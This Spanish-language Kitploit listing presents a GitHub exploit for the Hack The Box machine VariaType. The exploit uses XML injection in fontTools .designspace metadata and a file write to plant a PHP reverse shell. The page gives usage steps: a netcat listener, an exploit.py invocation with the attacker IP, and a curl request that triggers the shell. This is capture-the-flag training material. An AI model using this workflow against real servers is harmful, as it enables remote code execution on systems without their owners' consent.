Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-66034-htb-ctf — Exploit para la máquina VariaType de HTB que aprovecha la inyección XML en fontTools para lograr RCE mediante un payload de reverse shell en PHP en los metadatos de .designspace. | Kitploit
Herramientas/GitHubGitHub/jwsly12/cve-2025-66034-htb-ctf
Generación de PayloadsExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y Educación
GitHubjwsly12/cve-2025-66034-htb-ctf

CVE-2025-66034-htb-ctf

Exploit para la máquina VariaType de HTB que aprovecha la inyección XML en fontTools para lograr RCE mediante un payload de reverse shell en PHP en los metadatos de .designspace.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
123hace 5 mesesAún no revisado
Compartir

CVE-2025-66034-htb-ctf

Exploit del Generador de Fuentes Variables VariaType

Este repositorio contiene un exploit especializado para la máquina VariaType de Hack The Box. El exploit aprovecha una vulnerabilidad en la forma en que la biblioteca fontTools o la aplicación web maneja archivos XML .designspace y la interpolación de metadatos para lograr Ejecución Remota de Código (RCE).

📝 Descripción

La vulnerabilidad existe en el proceso de generación de fuentes. Al crear un archivo designspace malicioso, podemos inyectar un payload de reverse shell PHP en los metadatos de la fuente (específicamente en el campo <labelname>). Cuando el servidor procesa estos archivos para generar una fuente variable, escribe la salida en una ruta definida por el usuario, permitiéndonos colocar un shell .php en la raíz web.

🛠️ Características

  • Generación Automática de Fuentes: Crea fuentes maestras source-light.ttf y source-regular.ttf válidas usando fontTools.
  • Inyección XML: Genera un archivo designspace malicioso con un payload PHP envuelto en CDATA.
  • Path Traversal/Escritura Arbitraria de Archivos: Intenta guardar la "fuente" resultante como un archivo .php en el directorio público.
  • Aleatorización: Genera nombres de shell únicos para evitar conflictos.

🚀 Requisitos

Debes tener Python 3 instalado junto con las siguientes librerías:

root@kitploit:~
pip install fontTools requests

💻 Uso

1. Inicia tu listener

En tu máquina local (o Pwnbox), inicia un listener de Netcat:

root@kitploit:~
nc -lvnp 4444

2. Ejecuta el exploit

Ejecuta el script proporcionando tu IP VPN de HTB y el puerto del listener:

root@kitploit:~
python3 exploit.py --ip <TU_IP> --port 4444

3. Activa el shell

Si la subida devuelve un 200 OK (o a veces incluso un 500 si el procesamiento ocurre antes del error), el script proporcionará el nombre del archivo. Accede a él mediante curl o tu navegador:

root@kitploit:~
curl http://portal.variatype.htb/shell_xxxxxx.php

⚙️ Argumentos

ArgumentoDescripciónPor defecto
--ipTu IP de listener (VPN)Requerido
--portTu puerto de listenerRequerido
--pathRuta de destino para el shell/var/www/portal.variatype.htb/public
--urlEl endpoint de subidahttp://variatype.htb/tools/.../process

⚠️ Aviso legal

Este script está destinado únicamente a fines educativos y pruebas de penetración autorizadas. Acceder o atacar objetivos sin autorización previa es ilegal.


Cómo usar este README:

  1. Guarda el contenido anterior como README.md en la misma carpeta que tu script.
  2. Asegúrate de que tu script se llame exploit.py o actualiza el nombre del archivo en los comandos anteriores.
Descargar herramienta